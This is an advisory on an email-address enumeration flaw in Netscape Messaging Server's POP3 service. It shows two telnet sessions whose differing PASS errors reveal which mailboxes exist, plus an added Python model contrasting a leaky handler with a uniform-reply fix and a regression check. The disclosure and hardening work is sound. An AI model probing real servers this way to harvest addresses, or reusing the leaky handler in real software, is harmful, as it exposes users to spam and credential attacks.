Netscape Messaging Server Email Address Verification Vulnerability

If an invalid password is entered for a valid email address while attempting to connect to Netscape Messaging Server, an error message stating that the password is incorrect will be displayed. However, when entering an invalid email address, the error message returned will state that the specified email address is an invalid mailbox. Due to the differing error messages, it is possible for email address harvesters to acquire lists of valid email addresses.

Below is an example of the discrepancy between the two error messages:

[user@ ~]$ telnet target 110
Trying target...
Connected target (target).
Escape character is '^]'.
+OK target POP3 service (Netscape Messaging Server 4.15 Patch 1 (built Mar 15 2000))
USER test.user
+OK Name is a valid mailbox
PASS password
-ERR Password incorrect
quit
+OK
Connection closed by foreign host.

[user@ ~]$ telnet target 110
Trying target...
Connected to target (target).
Escape character is '^]'.
+OK target POP3 service (Netscape Messaging Server 4.15 Patch 1 (built Mar 15 2000))
user invalid.user
+OK Name is a valid mailbox
PASS password
-ERR User unknown
quit
+OK
Connection closed by foreign host.
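
The following is an added example, not code from Netscape Messaging Server or from the original advisory. It models the PASS handling shown in the two sessions above next to a hardened form that gives one failure reply for both cases, with a check that can be used as a regression test. The mailbox store, the function names and the "-ERR Authentication failed" text are assumptions made for illustration.

```python
import hashlib
import hmac

# Constructed sample mailbox store: name -> SHA-256 of the password.
# Illustration only; a real server would use a salted, slow password hash.
MAILBOXES = {"test.user": hashlib.sha256(b"correct horse").hexdigest()}
# Stand-in hash compared against when the mailbox does not exist.
DUMMY_HASH = hashlib.sha256(b"no such mailbox").hexdigest()


def _digest(password: str) -> str:
    return hashlib.sha256(password.encode()).hexdigest()


def pass_reply_leaky(user: str, password: str) -> str:
    """Mirrors the sessions above: the failure text depends on whether
    the mailbox exists."""
    stored = MAILBOXES.get(user)
    if stored is None:
        return "-ERR User unknown"
    if not hmac.compare_digest(stored, _digest(password)):
        return "-ERR Password incorrect"
    return "+OK"


def pass_reply_uniform(user: str, password: str) -> str:
    """Hardened form: a single failure reply, and the comparison runs even
    for an unknown mailbox so both paths do the same work."""
    stored = MAILBOXES.get(user, DUMMY_HASH)
    matches = hmac.compare_digest(stored, _digest(password))
    if user in MAILBOXES and matches:
        return "+OK"
    return "-ERR Authentication failed"  # assumed wording


def leaks_mailbox_existence(handler) -> bool:
    """Regression check: True if a wrong password on a real mailbox and a
    login to a missing mailbox produce different replies."""
    return handler("test.user", "wrong") != handler("invalid.user", "wrong")


if __name__ == "__main__":
    print("leaky handler leaks:", leaks_mailbox_existence(pass_reply_leaky))
    print("uniform handler leaks:", leaks_mailbox_existence(pass_reply_uniform))
```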


 

Copyright 2010, SecurityFocus